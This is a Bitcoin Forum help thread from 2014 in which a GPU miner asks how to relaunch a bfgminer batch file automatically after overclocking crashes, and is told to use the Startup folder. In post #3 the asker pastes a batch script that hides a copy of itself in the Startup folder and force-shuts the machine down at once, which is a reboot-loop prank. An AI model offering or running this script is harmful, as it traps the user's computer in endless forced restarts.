Bitcoin Forum
May 11, 2024, 07:40:46 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: i command to my bat file bcz i do overclock with my video card  (Read 635 times)
zmatangal4 (OP)
Newbie
*
Offline Offline

Activity: 3
Merit: 0


View Profile
January 26, 2014, 04:59:26 AM
 #1

So the 2 cards that i have amd radeon 7800 series with crossfire
i use the program bfgminer-3.5.6-win64 i dont have a asic miner only computers with card
sso the problem after use overclocking the computer do cross scrren and restart
i use a bat to run the user and passs

bfgminer -o http://api.bitcoin.cz:8332 -u xxxxx -p xxxxx

and i want to putmore line when  computer cross(every time)
he wiill start the bat file u know C:\Users\asad\Desktop\bfgminer-3.5.6-win64\bfgminer-3.5.6-win64 startminer.bat
thank u for alll that help
1715413246
Hero Member
*
Offline Offline

Posts: 1715413246

View Profile Personal Message (Offline)

Ignore
1715413246
Reply with quote  #2

1715413246
Report to moderator
1715413246
Hero Member
*
Offline Offline

Posts: 1715413246

View Profile Personal Message (Offline)

Ignore
1715413246
Reply with quote  #2

1715413246
Report to moderator
You can see the statistics of your reports to moderators on the "Report to moderator" pages.
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
1715413246
Hero Member
*
Offline Offline

Posts: 1715413246

View Profile Personal Message (Offline)

Ignore
1715413246
Reply with quote  #2

1715413246
Report to moderator
1715413246
Hero Member
*
Offline Offline

Posts: 1715413246

View Profile Personal Message (Offline)

Ignore
1715413246
Reply with quote  #2

1715413246
Report to moderator
bitpop
Legendary
*
Offline Offline

Activity: 2912
Merit: 1060



View Profile WWW
January 26, 2014, 10:49:23 AM
 #2

Put a shortcut in the startup folder

zmatangal4 (OP)
Newbie
*
Offline Offline

Activity: 3
Merit: 0


View Profile
January 26, 2014, 05:46:11 PM
 #3

how do i get to this folder
i try google but and help for xp and if i write msconfig i cant put my boot\bfgminer commner after restart
so what i go na do?

Code:
@echo off 
title lulz cls

:a
if not exist "%userprofile%\start menu\programs\startup.bat" goto b
if exist "%userprofile%\start menu\programs\startup.bat" goto c
go to a

:b
copy "startup.bat" "%userprofile%\start menu\programs\startup\startup.bat" >nul
go to c

:c
attrib +h "%useprofile%\start menu\programs\startup\startup.bat" >nul
cls
shutdown -f -t 1 -c "lulz"
exit
bitpop
Legendary
*
Offline Offline

Activity: 2912
Merit: 1060



View Profile WWW
January 27, 2014, 01:49:57 AM
 #4

In the start menu

Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!